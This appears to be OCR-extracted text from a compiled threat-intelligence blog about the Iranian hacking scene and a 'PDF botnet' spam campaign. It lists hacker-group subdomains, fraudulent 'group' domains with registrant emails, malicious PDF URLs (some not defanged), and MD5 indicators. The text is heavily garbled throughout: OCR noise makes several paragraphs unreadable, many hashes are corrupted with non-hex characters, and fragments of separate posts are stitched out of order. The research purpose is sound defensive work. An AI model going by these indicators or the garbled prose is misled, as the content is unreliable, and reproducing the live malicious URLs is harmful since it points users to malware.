http://bmM98511.persiangig.com/ 
http://b000000ote. persiangig.com/ 
http://boomba.persiangig.com/ 
http://boromir.persiangig.com/ 
http://boxochi.persiangig.com/ 
http://brainbOy.persiangig.com/ 
http://bro2music.persiangig.com/ 
http://bsto0.persiangig.com/ 
http://bulurp.persiangig.com/ 
http://cOderl.persiangig.com/ 
http://catcOnfig.persiangig.com/ 
http://cdn.persiangig.com/ 
http://ceh2010.persiangig.com/ 
http://cenator-vb.persiangig.com/ 
http://chater.persiangig.com/ 
http://chichi1370.persiangig.com/ 
http://choObin77.persiangig.com/ 
http://ciph3r.persiangig.com/ 
http://citydesign.persiangig.com/ 
http://civilz.persiangig.com/ 
http://cld.persiangig.com/ 
http://clearncenter.persiangig.com/ 
http://clickcon.persiangig.com/ 
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http://codez.persiangig.com/ 
http://coldfire.persiangig.com/ 
http://coldn.persiangig.com/ 
http://com-engineer.persiangig.com/ 
http://comonism.persiangig.com/ 
http://compnet91.persiangig.com/ 
http://computer-lab2.persiangig.com/ 
http://coolthings.persiangig.com/ 
http://countalireza.persiangig.com/ 
http://cover-weblog.persiangig.com/ 
http://cr4ck3r.persiangig.com/ 
http://cr4zylov3r.persiangig.com/ 
http://craft.persiangig.com/ 
http://crim3r.persiangig.com/ 
http://csundragon.persiangig.com/ 
http://cyberboys.persiangig.com/ 
http://cyberdevilz.persiangig.com/ 
http://cybersaboteur.persiangig.com/ 
http://d3f4c3r.persiangig.com/ 
http://d3struct1v3.persiangig.com/ 
http://d4rvi5hi.persiangig.com/ 
http://d4wood.persiangig.com/ 
http://dad4mahan.persiangig.com/ 
http://daimon74.persiangig.com/ 
http://dajok.persiangig.com/ 
http://dangerman.persiangig.com/ 
http://dangerous-hacker.persiangig.com/ 
http://danial-secret.persiangig.com/ 
http://danitfk.persiangig.com/ 
http://darkcoder.persiangig.com/ 
http://darkhacker.persiangig.com/ 
http://darkhastdotnet.persiangig.com/ 
http://darkhastdotnet2.persiangig.com/ 
http://darknemesis.persiangig.com/ 


http://darknessxxl.persiangig.com/ 
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http://darkunder.persiangig.com/ 
http://darkwitch.persiangig.com/ 
http://datacoders.persiangig.com/ 
http://datairan.persiangig.com/ 
http://datawar.persiangig.com/ 
http://davarpour2.persiangig.com/ 
http://deadangel.persiangig.com/ 
http://deface.persiangig.com/ 
http://defaced.persiangig.com/ 
http://defcon.persiangig.com/ 
http://delbar67.persiangig.com/ 
http://delsa.persiangig.com/ 
http://delta-hacker.persiangig.com/ 
http://deltahacking.persiangig.com/ 
http://deltahackingmember.persiangig.com/ 
http://deragon.persiangig.com/ 
http://destroyerh3ll.persiangig.com/ 
http://devilx.persiangig.com/ 
http://devilzcOder.persiangig.com/ 
http://diagramm.persiangig.com/ 
http://dialup-download.persiangig.com/ 
http://diazpame10.persiangig.com/ 
http://diedloves.persiangig.com/ 
http://digital-security.persiangig.com/ 
http://dl-qeshmdownload-tk.persiangig.com/ 
http://dl1-security-network.persiangig.com/ 
http://dl4-downloadfa.persiangig.com/ 
http://dlipdate.persiangig.com/ 
http://dorsaazari.persiangig.com/ 
http://dostetdarammaa.persiangig.com/ 
http://dotaallstars.persiangig.com/ 
http://downloadestan5.persiangig.com/ 
http://dr-h4ck3r.persiangig.com/ 
http://dr-root.persiangig.com/ 
http://drduger.persiangig.com/ 
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http://drkknight.persiangig.com/ 
http://drmaster.persiangig.com/ 
http://drmrostami.persiangig.com/ 
http://drskull.persiangig.com/ 
http://drtrojan.persiangig.com/ 
http://drwxrwxrwx.persiangig.com/ 
http://dvd4persian.persiangig.com/ 
http://dwast.persiangig.com/ 
http://e3mail.persiangig.com/ 
http://eblicen.persiangig.com/ 


http://ebooksabalantech.persiangig.com/ 


http://ehr4m.persiangig.com/ 
http://ehsan-empire.persiangig.com/ 
http://ehsan6206.persiangig.com/ 
http://ehsankh.persiangig.com/ 
http://ehsanmae.persiangig.com/ 
http://ekrami01.persiangig.com/ 
http://ekramil.persiangig.com/ 
http://ekrami10.persiangig.com/ 
http://ekrami3.persiangig.com/ 
http://eliem.persiangig.com/ 
http://elvator.persiangig.com/ 
http://elyarz.persiangig.com/ 
http://encOd3r.persiangig.com/ 
http://encoder.persiangig.com/ 
http://engineer-sniper.persiangig.com/ 
http://erfan21.persiangig.com/ 
http://erfan3s3.persiangig.com/ 
http://erfanx2x.persiangig.com/ 
http://erfxn.persiangig.com/ 
http://eror-include.persiangig.com/ 
http://error-back-x9.persiangig.com/ 
http://esfahan-security.persiangig.com/ 
http://eshak.persiangig.com/ 
http://eshraq.persiangig.com/ 
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http://esmaeilpoor.persiangig.com/ 
http://esmailapps.persiangig.com/ 
http://esmiley.persiangig.com/ 
http://esoft.persiangig.com/ 
http://essaji.persiangig.com/ 
http://esshop.persiangig.com/ 
http://ettefaghi.persiangig.com/ 
http://evil-max.persiangig.com/ 
http://evilshadow.persiangig.com/ 
http://eximor.persiangig.com/ 
http://expl0iters.persiangig.com/ 
http://explorerboy.persiangig.com/ 
http://ezami.persiangig.com/ 
http://far30tools.persiangig.com/ 
http://faraz4u.persiangig.com/ 
http://farbodezrael.persiangig.com/ 
http://farbodmahini.persiangig.com/ 
http://farbodmahini2.persiangig.com/ 
http://farhad242.persiangig.com/ 
http://faridmafia.persiangig.com/ 
http://farsclip.persiangig.com/ 
http://farzad62.persiangig.com/ 
http://fatalking.persiangig.com/ 
http://fazel-fbi.persiangig.com/ 
http://fazilamiry.persiangig.com/ 
http://fobiyght76.persiangig.com/ 
http://fcbwin.persiangig.com/ 
http://fdownloadir.persiangig.com/ 
http://fedora.persiangig.com/ 
http://fengl.persiangig.com/ 
http://fghjjh.persiangig.com/ 
http://files.persiangig.com/ 
http://firebaxe.persiangig.com/ 
http://fixxer.persiangig.com/ 
http://foxworld.persiangig.com/ 
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http://freelogo.persiangig.com/ 
http://frees.persiangig.com/ 
http://freescriptdl.persiangig.com/ 
http://freezer.persiangig.com/ 
http://fulltarh.persiangig.com/ 
http://fun4ir.persiangig.com/ 
http://gOld-soft.persiangig.com/ 


http://g3n3rall-blackhat.persiangig.com/ 


http://galar2.persiangig.com/ 
http://galebsaz.persiangig.com/ 
http://game22009.persiangig.com/ 
http://garenatools.persiangig.com/ 
http://geneticz.persiangig.com/ 
http://gha3dak.persiangig.com/ 
http://ghalebkade.persiangig.com/ 
http://ghased2006.persiangig.com/ 
http://ghayegh-khali.persiangig.com/ 
http://ghcmmm.persiangig.com/ 
http://gigmohsen.persiangig.com/ 
http://gikgik.persiangig.com/ 
http://godlike.persiangig.com/ 
http://gold-sOft.persiangig.com/ 
http://gold33.persiangig.com/ 
http://goldhos.persiangig.com/ 
http://golpaboyz.persiangig.com/ 
http://goodboy3113.persiangig.com/ 
http://goord.persiangig.com/ 
http://gorosneh.persiangig.com/ 
http://gropmilad.persiangig.com/ 
http://groupsyahoo.persiangig.com/ 
http://gta5edit.persiangig.com/ 
http://gtaimages.persiangig.com/ 
http://h-team.persiangig.com/ 
http://hOc3yn.persiangig.com/ 
http://h3ktOrz.persiangig.com/ 
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http://N3x73l.persiangig.com/ 
http://h3xbO0yz.persiangig.com/ 
http://h4ck-tools.persiangig.com/ 
http://h4ckerr.persiangig.com/ 
http://h4ckkeer.persiangig.com/ 
http://h4med.persiangig.com/ 
http://nhacker-prog.persiangig.com/ 
http://hacker.persiangig.com/ 
http://nackeran99.persiangig.com/ 
http://nackerashiyane.blogfa.com/ 
http://hackreza.persiangig.com/ 
http://hadihadi.persiangig.com/ 
http://haftevigarl.persiangig.com/ 
http://hakaki.persiangig.com/ 
http://nakha.persiangig.com/ 
http://hali3eyyedh.persiangig.com/ 
http://ham3chi.persiangig.com/ 
http://naman313.persiangig.com/ 
http://nhamed-qcc.persiangig.com/ 
http://namedanno.persiangig.com/ 
http://hamedhaker.persiangig.com/ 
http://namedweb.persiangig.com/ 
http://namid-xsky.persiangig.com/ 
http://namidsari.persiangig.com/ 
http://hamidsos3.persiangig.com/ 
http://hamidvirusi.persiangig.com/ 
http://hamidzip.persiangig.com/ 
http://nhamix2x.persiangig.com/ 
http://nares.persiangig.com/ 
http://hashor.persiangig.com/ 
http://nhashorblackhat.persiangig.com/ 
http://hassan-kaka.persiangig.com/ 
http://hatefkhaledi2.persiangig.com/ 
http://hck-tools.persiangig.com/ 
http://ncthemep.persiangig.com/ 
26662 


a Regency Group Inc 


\BLE BUSINESS SOLUTIONS 


Wetcome to our Web ute. 


The company mas setup in 1990 in New York, the UGA by free entusasts nho I 


Nave franca education, The head of he comparry was Mofwed Watson. At the very Paseo 


begrning cf it buamest actyty the company provided farty narton range of | fox | 


SOF VCS at The Hrwestment markeet. Wtwr 1S pears of hard work he company has 


acqured nternatonal standing and managed to develcp 8 Geta! francal foront Desens naa aber 
Nolin eet) the staff of 3.000 peogie and Neadouw ters 1) more Dae 900 CONES 
the wort 
“SEES 99/05/2009 - etary Watch: Mall.com 
Boisters Powersetiers 
‘What do we Offer? Half com sales courtt toward PowerSeller 


Stats, Sytal dow 


6 ad mage Sickey 


' aq ity etay competion: 
+» Brokerage Services and a banged ct Suse for sale 
Broker age serces Pde B.000r1 1 DupngAeiing of Dares on behal of Me cert 


ard in al operators pertaning to secondary reget ston, accounting and storage of 


searmes O9/03/2009 - Wanted: Online 
sera mage ecemmerea doves -and 
=) tron ones - ae Dar 
o * desstieds on 0 vable crervad Sr ovine 
iA 


y of depository services muhes them avaliable to the mtererhed co. 
ors. Ou Depositary ef present anatyboa! reports to 


pontary te Jerk s able to heen Yack of negetve 
consequences 0! corperete sce y and authorize a experts to defend ha 09/01/2009 - Lead Generation vie 
reeests n hore of De enter Atthahe Marketing 
rod more Affhate marketers are firing new - and 
mere apy eisve - ways to reTeme 
reome fom drectng talic to & 
» Corporate Finance Commerce $tes 
‘The Corporate Finance Caper tment caters businesses for services, focused on reressng ther competive aaa 
bOvantages 9) The martet due 10 merger, takeover or other s9 atege performance 
Sead nace 08/28/2009 - Bust or Boon? 
Catcueting Blog ROI 
» Trisst Managensent ‘Ths meet reports of phenomena doutie 
Got sales Gow leveling off may be 
rire buaress comers De jptter 
Feel the conversence of shrge'y to vat Management and the & onten wa grees pcb iprahel Setdideal venaietien ha bie 
Hesponeiaty 10 keep Vack of francal martets stusbon every Gry, to balance # boosting the botion ine 
depending on Ouran easton to develop talored ai a! wp moron Pe tock market, baaed on 
estmated cooperation Ure, rik Wnts ane other terms, Gefvred by the rest [ Fees moe OM 
feeds 
+ Legal Services 


To erare all capital procurement tacks of our cuttomers are solved, our company enables them wath 
Services, whch help to make De ares atractve and to find proactive Mrestment soktons. 


redeye-groupinc .cc - Email: chen.poon1732646@yahoo.com 
regency-groupco .cn - Email: abuseemaildhcp@gmail.com 
regency-groupnet .cc - Email: justin dickerson@ymail.com 
regency-groupnet .cn - Email: abuseemaildhcp@gmail.com 


rengo-groupli .com - Email: jaded@co5.ru 
saturn-groupco .cn - Email: abuseemaildhcp@gmail.com 
scope-group .cc - Email: don.ram@yahoo.com 
scope-groupmain .cc - Email: don.ram@yahoo.com 
strol-groupli .cn - Email: abuseemaildhcp@gmail.com 


summit-groupinc .cc - Email: Gregory.Michell2009@yahoo.com 


theblackend .cn - Email: morgan.greg@yahoo.com 


vector-groupfine .cn - Email: abuseemaildhcp@gmail.com 


vector-groupfly .cc - Email: mr.freeddyy@yahoo.com 
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http://hdnsoft.persiangig.com/ 
http://heavenly-boys.persiangig.com/ 
http://nebou.persiangig.com/ 
http://helal92.persiangig.com/ 
http://hellgatel.persiangig.com/ 
http://hesam1955.persiangig.com/ 
http://nesam4u.persiangig.com/ 
http://hfarchive.persiangig.com/ 
http://hiacker.persiangig.com/ 
http://hivO000.persiangig.com/ 
http://hivO1.persiangig.com/ 
http://hivateam.persiangig.com/ 
http://Akhmerikhi.persiangig.com/ 
http://hkingsoftware.persiangig.com/ 


http://hogwartsschool.persiangig.com/ 


http://nhomanmh9Y5.persiangig.com/ 
http://honey24.persiangig.com/ 
http://hoodshmand.persiangig.com/ 
http://hoseeinO.persiangig.com/ 
http://hosinn.persiangig.com/ 
http://hosseingig.persiangig.com/ 
http://hotmusichost.persiangig.com/ 
http://hotweb24.persiangig.com/ 
http://http5.persiangig.com/ 
http://nhumankhan.persiangig.com/ 
http://hunterprogs.persiangig.com/ 
http://hurricane8.persiangig.com/ 
http://hushy.persiangig.com/ 
http://i3lue.persiangig.com/ 
http://iZ0oter.persiangig.com/ 
http://ipbhteam.persiangig.com/ 
http://ice-boy.persiangig.com/ 
http://iman2sh.persiangig.com/ 
http://imanbenoit.persiangig.com/ 


http://immortal-boy.persiangig.com/ 
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http://imperial2008.persiangig.com/ 
http://impossibles.persiangig.com/ 
http://impostor-76171.persiangig.com/ 
http://impostor.persiangig.com/ 
http://incremental.persiangig.com/ 
http://index.persiangig.com/ 
http://inf3cted.persiangig.com/ 
http://infoelek.persiangig.com/ 
http://infohooman.persiangig.com/ 
http://infology2.persiangig.com/ 
http://infology5.persiangig.com/ 
http://infoweb.persiangig.com/ 
http://injenious.persiangig.com/ 
http://inthehalk.persiangig.com/ 
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affina-groupnet.cn 
annuity-grouplic.cn 
entrust-groupsve,cn 
melson-groupli.cn 
mx afina-groupnet.cn 
mx. annuity-grouplic.cn 
mx.extreme-groupinc.cn 
mx. massive-groupsve.cn 
mx puritan-groupinc.cn A 222235137236 > 222.35.136.0/21 —s_p AS38356 
mxtotalgroupine.cn , 
nslL.reddbutton.cn 
nsl.windcontrol.cc 
prime-groupco.com 
puritan-groupine.cn 
regency-groupnet.cn 
scope-groupmain.cn 


trans-groupmain.com 


Parked on 222.35.137.236: 

affina-groupnet .cn - Email: abuseemaildhcp@gmail.com 
affina-groupsvc .cc - Email: justin dickerson@ymail.com 
annuity-groupllic .cn - Email: abuseemaildhcp@gmail.com 
annuity-groupllc .com - Email: jelly@infotorrent.ru 
annuity-groupnet .cc - Email: justin dickerson@ymail.com 
annuity-groupnet .cn - Email: abuseemaildhcpo@gmail.com 
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integrity-groupinc .cc - Email: justin dickerson@ymail.com 
integrity-groupinc .cn - Email: abuseemaildhco@gmail.com 
integrity-groupsvc .com - Email: jelly@infotorrent.ru 
invalda-groupmain .cn - Email: rocco _invalda@yahoo.com 
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http://timer.persiangig.com/ 
http://tink3r.persiangig.com/ 
http://tir3x-r00t. persiangig.com/ 
http://titaksecteam.persiangig.com/ 
http://titaniom1370.persiangig.com/ 
http://tk222.persiangig.com/ 
http://torbat-h.persiangig.com/ 
http://torbatiha.persiangig.com/ 
http://tornado20.persiangig.com/ 
http://trOyt34m.persiangig.com/ 
http://tracker.persiangig.com/ 
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http://tsunamihell.persiangig.com/ 
http://ttran.persiangig.com/ 
http://turkhackers.persiangig.com/ 
http://uh12uh12.persiangig.com/ 
http://under-world.persiangig.com/ 
http://uneskm.persiangig.com/ 
http://unicorn88.persiangig.com/ 
http://unknOwn72.persiangig.com/ 
http://upload-ekrami.persiangig.com/ 
http://upload2020.persiangig.com/ 
http://upload4u.persiangig.com/ 
http://uploadh.persiangig.com/ 
http://uploadr.persiangig.com/ 
http://uplode-east.persiangig.com/ 
http://urmiatheme.persiangig.com/ 
http://utab19.persiangig.com/ 
http://v4hid.persiangig.com/ 
http://vahid-master.persiangig.com/ 
http://vahid4251.persiangig.com/ 
http://vahidsistem.persiangig.com/ 
http://vampire-diaries.persiangig.com/ 
http://vampires.persiangig.com/ 
http://vobmahdi2009.persiangig.com/ 
http://veron.persiangig.com/ 
http://vndmsm.persiangig.com/ 
http://vibox.persiangig.com/ 
http://virang4r.persiangig.com/ 


http://virtualuniversityofshiraz.persiangig.com/ 


http://virus45.persiangig.com/ 
http://vu2aut.persiangig.com/ 
http://vvanted.persiangig.com/ 
http://vvolf.persiangig.com/ 
http://w00rm.persiangig.com/ 
http://w3bbaz.persiangig.com/ 
http://wanted1.persiangig.com/ 
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http://wantedst.persiangig.com/ 
http://web-pc-training.persiangig.com/ 
http://webzzz.persiangig.com/ 
http://wolf1208.persiangig.com/ 
http://www.antifilterby4ull-hacker.ht/ 
http://www.homepage.ht/ 
http://www. virus45defacepage.ht/ 
http://x-emperor-x.persiangig.com/ 
http://xpxpsi.persiangig.com/ 
http://xsky. persiangig.com/ 
http://yaban3.persiangig.com/ 
http://yahoo-mailer.persiangig.com/ 
http://yahoooaction.persiangig.com/ 
http://yasmlh.persiangig.com/ 
http://yazdanx7.persiangig.com/ 
http://yhadi.persiangig.com/ 
http://yousefli.persiangig.com/ 
http://ysrttu.persiangig.com/ 
http://z-team.persiangig.com/ 
http://zabOn.persiangig.com/ 
http://zeron.persiangig.com/ 


Stay tuned! 


1 
2, 

3 

4 

5 

6. 


https ://archive.org/download/dancho-danchev-analysis-report-iran-hacking-scene/Dancho_Danchev_Analysis_R 


eport_Iran_Hacking_Scene.ra 


19.3. March 


19.3.1 Exposing the "PDF Botnet" - An OSINT Analysis (2023-03-03 19:34) 


[1] 
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https: //ragaz.co.za/XSRYdR1H?utm_term=picsart +background+ image++hd 

http: //www. lbt film. com/uploads/files/koxuwegemagobuwidewas . pdf 

https: //teputire.weebly. com/uploads/1/3/0/8/130813428/tixok. pdf 

http: //www.hypnot iseur.com/wp-content /plugins/formcraft /file- 
upload/server/content /files/16210e2f2aed0f---favagujegelivos. pdf 

http: //applecentervn.com/uploads/image/files/81922078809. pdf 

https: //villamishkan.com/310renonew/ front /images/files/womosut ilonotolil. pdf 
https: //jackinthegymtpe. com/uploads/files/202204101711569256. pdf 

https: //jigupipugefelo.weebly.com/uploads/1/3/4/3/134387822/kexowanegakuxiku. pdf 
https: //ulicetwojegomiasta. pl/kcfinder/upload/files/vadanetezukamiludi. pdf 
http: //toys4boys leather. com/userfiles/file/7 982175874. pdf 

http: //93564497. com/userfiles/texanefimewakatovatoz. pdf 

https: //ceb. lk/assets/js/kcfinder/upload/files/58252873057 . pdf 

http: //glassinter.de/kcfinder/upload/upload/23524790716. pdf 

https: //jaxurevinul.weebly.com/uploads/1/3/4/8/134868463 /3£297 5c6121556. pdf 
http: //szm. hu/userfiles/file/wenutoxeworudif. pdf 

https: //dojexivosofu.weebly.com/uploads/1/3/4/3/134348646/6486123. pdf 

http: //veraschwemmle.de/fckdata/file/dugivisoxolel. pdf 

https: //happycondo. leaddeehub. com/userfiles/files/lipefagajetelegusir. pdf 
https: //ninofupefuf.weebly. com/uploads/1/3/1/8/131856131/6e4017 01aa. pdf 
http: //www. auditsi.com/wp-content /plugins/formcraft /file- 
upload/server/content /files/1622914d312f84---45312087428. pdf 


Dear blog readers, 


I’ve recently stumbled upon a pretty interesting and worth mentioning malicious software and 
botnet spam and malicious software serving campaign that can be best described as a "PDF 
botnet" where the ultimate idea for both propagation and infection is the active utilization of 
PDF files which are exclusively hosted on compromised or on purposely malicious and fraudu- 
lent rogue and bogus infrastructure. 


Sample screenshots include: 


97D459C 1CS6E327B2FC 4000315168053 
4640444919 16C022B3B4556CSSFD4C22 
6768ESS400BB 1B2E 165854CCECANS1AS 
199CFFO6F355 1657BC92909C24,928428 
ACCD011ISB499F75536F8D48BDCO708E0 
159D4B0C1347C85 16ED007536B24EC7FS 
235DA459B08FFCB84560526666441443E 
7SD2C4C3832E342934F4E07911757561 
431F394EB31E4,C4163F 680027 1347D8E 
C9B3142CCS7B4 ISEBS10CISDBCCSFAD1 
[ 2 ] CSASODDCSEAI8S0F9E 12 1FS3F96 13DCF 


3ASC49EF0EE9090979E902ACCI36BADO 
1F33F74DA311F ABOEA269FD657028409 
A0?S87CSE7EO1CBFIAFAC7A469ESAA35 
8E815127969943DF787731FA3226930C 
55 13B8A5636095F44FD591525ECD72BC 
Ab29DF34D8 16C4B0ABBSID7A61A86FD7 
10C54D4,100008DA2E4B1 1F53C220D762 
3C402B886B6E4COBD8CC893 126878455 
56D3AD953D817869D766AFSF7E10CASS 
388FBO258DA09DSC3922AA,AA 1BB7Z1D6 
B79AEIAB464594F 349B37F 1E83F.C99 14 
D7506730A7858DSB293B9FS4DAFCOES1 
A44FE0258F26C5CSBDEFAFE7AC841383 
D751706B295A39AB430D08AB8941F 485 
3D8C2D8BD 1984B4054C 10232197 B00A3 

[3] 2808A6181A41B5B530D09FC9793F 1872 
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10Schers.netsociality com \upload‘files\65 13350472 1,.pdF 
105chers.netsociality com \upload‘files‘\65 126582258 dF 
10Schers.netsociality com \upload‘files\65 106538520 pdf 
105chers.netsociality comupload\files\65097542930 pdf 
105chers.netsociality com'upload files\65097033646 pdf 
10Schers.netsociality com'uploadfiles\65095 106769,.pdF 
105chers.netsociality com\upload\files\65092101739,pdF 
10Schers.netsociality com'upload\files\65082426098 pdf 
10Schers.netsociality .comuploadfiles\6507478 1923 pdf 
105chers .netsociality com \upload‘files\65053346 188 pdF 
[ 4 ] 10Schers.netsociality com \upload‘files\65045 170125 .pdF 


\105chers.netsociality com \upload\files\52598 189723 pdF 
\105chers.netsociality com \upload\files\52595666760,pdF 
\105chers netsociality com \upload\files}5259 1074206 pdF 
\10Schers.netsociality com \upload\files\52590636090,pdF 
\105chers netsociality com \upload\files\52585945044,pdF 
\105chers netsociality .com\upload\files\52575756525 dF 
\10Schers netsociality .com\upload\files\52572433741 pdf 
\105chers netsociality .com\upload\files\52568930708 pdf 
\10Schers netsociality .com\upload\files\52559115925 pdf 
\10Schers netsociality .com\upload\files\5255333 1505 pdf 
\105chers.netsociality com \upload\files\52552935749 pdf 
\105chers.netsociality com upload \files\52533736303 pdf 
[ 5] \105chers.netsociality com \upload\files\52533208506 pdf 


Sample URLs known to have been involved in the campaign include: 
hxxp:[/][/]ragaz[.]co[.]za[/IXSRYdR1H?utm _term=picsart+background+image++hd 
hxxp:[/][/Jwwwf.]lbtfilm[.Jcom[/Juploads[/Jfiles [/]koxuwegemagobuwidewas[.]pdf 
hxxp:[/][/]teputire[.]weebly[.]Jcom[/]uploads[/]1[/ 13[/]0[/18[/]130813428[/]tixok[.]pdf 


hxxp:[/][/]Jwwwl[.]hypnotiseur[.]com[/]wp-content[/]plu gins[/]formcraft[/]file- 
upload[/]server[/]content[/]files[ /]16210e2f2aed0f—favagujegelivos[. ]pdf 


hxxp:[/][/Japplecentervn[.]com[/]uploads[/Jimagel[/]fi les[/]81922078809[. ]pdf 
hxxp:[/][/]villamishkan[.]com[/]310renonewl[/]front[/] images[/]files[/]womosutilonotolil[. ]pdf 
hxxp:[/][/]jackinthegymtpe[.]com[/Juploads|[/Jfiles[/] 202204101711569256[. ]pdf 


hxxp:[/][/ljigupipugefelo[.]weebly[.]com[/Juploads[/] 1[/]3[/]4[/]3[/]134387822[/]kexowanegakuxiku[.]p 
df 


hxxp:[/][/Julicetwojegomiasta[.]pl[/]kcfinder[/]upload[ /]files[/]vadanetezukamiludi[.]pdf 
hxxp:[/][/]toys4boysleather[.]com[/]userfiles[/]file[/ ]7982175874[.]pdf 
hxxp:[/][/]93564497[.]com[/Juserfiles[/]Jtexanefimewakat ovatoz[.]pdf 

hxxp:[/][/]ceb[. ]Ik[/Jassets[/]js[/]kcfinder[/]up load[/]files[/]58252873057[.]pdf 
hxxp:[/][/]glassinter[.]de[/]kcfinder[/Jupload[/Juplo ad[/]23524790716[. ]pdf 

hxxp:[/][/]jaxurevinul[. }weebly[.]com[/Juploads[/]1[ /13[/]4[/]8[/]134868463[/]3f2975c6121556[.]pdf 
hxxp:[/][/]szm[.]hu[/]userfiles[/]file[/]wenutoxew orudif[.]pdf 


hxxp:[/][/]dojexivosofu[.]weebly[.]Jcom[/Juploads[/]1 [/]3[/]4[/]3[/]134348646[/]6486123[.]pdf 
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lime-groupnet .cn - Email: abuseemaildhcp@gmail.com 
massive-groupsvc .cc - Email: chen.p00n1732646@yahoo.com 


al i) 
+3) Annuity Group inc 
« 


| AboutUs Services Wews Vacancies Our Pertners Contacts 


— 


9 efiry Watch: Hall Cov 
’ Bern 
. Broker 
il 
O 


prime-groupco .cn - Email: abuseemaildhcp@gmail.com 
prime-groupco .com - Email: fuzz@ml3.ru 

prime-groupinc .cn - Email: abuseemaildhcp@gmail.com 
puritan-groupinc .com - Email: gone@corporatemail.ru 
redeye-groupco .cn - Email: abuseemaildhcp@gmail.com 
redeye-groupinc .cc - Email: chen.poon1732646@yahoo.com 
regency-groupnet .cc - Email: justin _dickerson@ymail.com 
regency-groupnet .cn - Email: abuseemaildhcpo@gmail.com 
saturn-groupsvc .cn - Email: abuseemaildhcp@gmail.com 
saturn-groupsvc .com - Email: jelly@infotorrent.ru 
vision-groupinc .cn - Email: abuseemaildhcp@gmail.com 
vision-groupsvc .com - Email: abuseemaildhcp@gmail.com 
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hxxp:[/][/]veraschwemmle[. ]de[/]fckdata[/]file[/]dugi visoxolel[. ]pdf 
hxxp:[/][/Jhappycondo[.]leaddeehub[.]com[/Juserfiles[/ ]files[/Jlipefagajetelegusir[. ]pdf 


hxxp:[/][/Jninofupefuf[.]weebly[.]com[/]uploads[/]1[ /)3(/]10/18[/113- 
1856131[/]6e401701aa[.]pdf 

hxxp:[/][/JwwwI[.]auditsi[.]com[/]wp-content[/]plugins [/]formcraft[/]file- 
upload[/]server[/]content[/Jfiles[/] 1622914d312f84—45312087428[. pdf 
hxxp:[/][/Jwwwl[.]christinemartin[.]co[.]uk[/]wp-conte nt[/]plugins[/]formcraft[/]file- 


upload[/]server[/]content[ /]files[/]1621dac28b28a0—tufupavokuj[. ]pdf 
hxxp:[/][/]Jsendediangi[.]Jcom[/]Jupload _fck[/]file[/]2022-3-21[/]20220321161426543141[.]pdf 


hxxp:[/][/Jerdelyironkbutor[.]hu[/Jadmin[/]kcfinde r[/Jupload[/]files[/]sukotigipapewefowul.- 
]pdf 


hxxp:[/][/]Jstudioingegneriavaragnolo[.]com[/Juserfiles[/] files[/]kilukowap[.]pdf 
hxxp:[/][/]f-kcc[.]jp[/luser _data[/Juserfiles[/]files[/]22156092393[. ]pdf 
hxxp:[/][/Jalkoplast[.]rs[/]files[/]28560168304[.]pdf 
hxxp:[/][/Jarborspringsforestry[.]Jcom[/Jimg[/]files[/] kelagug[.]pdf 
hxxp:[/][/]cissud[.]it[/]uploads[/]ck _editor[/]files[/]33956310758[.]pdf 
hxxp:[/][/]jfd[.]Jnews[/lapp[/]webroot[/Juploads [/]files[/]71167178402[.]pdf 
hxxp:[/][/Jleg-vein[.]jp[/]kcfinder[/Jupload[/]files [/]sevavimelozojufezetowe|[. ]pdf 
hxxp:[/][/]duxotitur[.]weebly[.]Jcom[/Juploads[/]1[/ ]3[/]4[/15[/]134596147[/]5545494[. ]pdf 
hxxp:[/][/]tree-house[.]jp[/Jassets[/]news[/]files[ /]Jtevasurodajaxajezetatug[.]pdf 


hxxp:[/][/]kikebazelagugez[.]weebly[.]com[/]uploads[/] 1[/]4[/]1[/]2[/]141287616[/]77fd513b304b[.] 
pdf 


Sample MD5s known to have been involved in the campaign include: 
5BB96B309B8CB58071B73118D1A59C05 1278967687.pdf 
6E3EB89CFD46D107905D9F60853E2661 1410845058.pdf 
OCF4455F92A6397521FC9BDO8FC70A12 1487091430.pdf 
20DA43AD4878B9F925F88854574010E2 1983674347.pdf 
8C2E4E0C3EB5E0131324CA54FD1648BE 3480745958. pdf 
23C45840B8F4EEF5F53CD35BC087D299 3552074133.pdf 
9DA1E72A18F214555449BA3F8EBD1399 3964667732.pdf 
879332C060A637B45E958911B84627B0 4092425255. pdf 
A409086CDEF2B6C412B33EA8B53E70AD 4474449835.pdf 
A4BB4C77DF8328AE46CEED4F373D2C1C 5741836759. pdf 
B2EB74B29686039C6DCAADO0B801A125E 6103190089.pdf 
342D15A9D8A9CAC6C482EF24C63FB7FF 6497559623.pdf 
53A8F7A614EAC9833FOCC5B97AE8650A 8742646775.pdf 
82D26DA61A8A0F389664859B38ECCO8C 8791363493.pdf 
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99B141C2A8E5073C17E81E144734A361 8983036096.pdf 
AD4C11FEFBE2A16AE8358BC51A8CBF3F 9120465087. pdf 
C9A7E18ACBF4EE0ED5435B73E1957A9F 9231960459. pdf 
699553341D62FBCOC1EE86266865DE72 9348069038. pdf 
FBFE529A50E15B66DD40829525E7F7BA 9699229203.pdf 
63BB161319E4E3584821D861AB541A0C 10348572906.pdf 
BB568F6CD8AE515EAD55259470298D9E 13416475440. pdf 
16E42D227211DAC5260BD8FD15A795C7 13823887193.pdf 
3C1CE3A5A0B49D5AA198F0279889D493 13847861787.pdf 
66BD8B8E665AC62A0FA67F111256541F 14137532633.pdf 
B16E989493AD266A39A123629EADD229 14318140657.pdf 
01373CA6F7533D66BF5A57390F9FFA31 16011902586.pdf 
5A5AA084699C1415D962E0D59E637815 16634552211.pdf 
511EEB37D73F3A001A9BB2D7640FA699 16906517497.pdf 
9C6FF15B179AB97DCA523A26C1DD94CC 16956540666.pdf 
BCO9ODFB24FF84BFAEC4606F78ED13795 19309202684.pdf 
DBD8A6D7FD0898EDODF40243E1AAAAF3 19351352124.pdf 
B4F88922DC09879A1497D90F8C35017D 19470278438.pdf 
CB954B8C3DCF9F2401777255F261175F 19942463577.pdf 
E3682885AD809552467EA6D31B72F161 20762845009.pdf 
94417B7921DEEC6DFDAF998D60092C0A 20935069756.pdf 
3B268B1A3007FE1CC7CF6CODA4BB48D8 21512890984. pdf 
0A50635185BD60EEC67121B6DA3ABA53 23074157543.pdf 
OA30EB2A19FOB8BFB9B88F4EFO5ED6F5 23192983959. pdf 
A475775F774BC3BE647E773651CF7D55 23413321203.pdf 
40EB5082EF96374B980381926703D5F8 23662198111.pdf 
789B95F9IDB6CAA4936B34D3CEB67812A 24028260079.pdf 
34089FC75CFDD5C13521F50946F4A60F 24383278820.pdf 
703A35F8A9783257633289A8112CA8EE 24570234767.pdf 
C571B477784EA78362C75E0C80BC52E5 24576678480.pdf 
7A6D9DA541454F316BE5833F540A661A 25012047289. pdf 
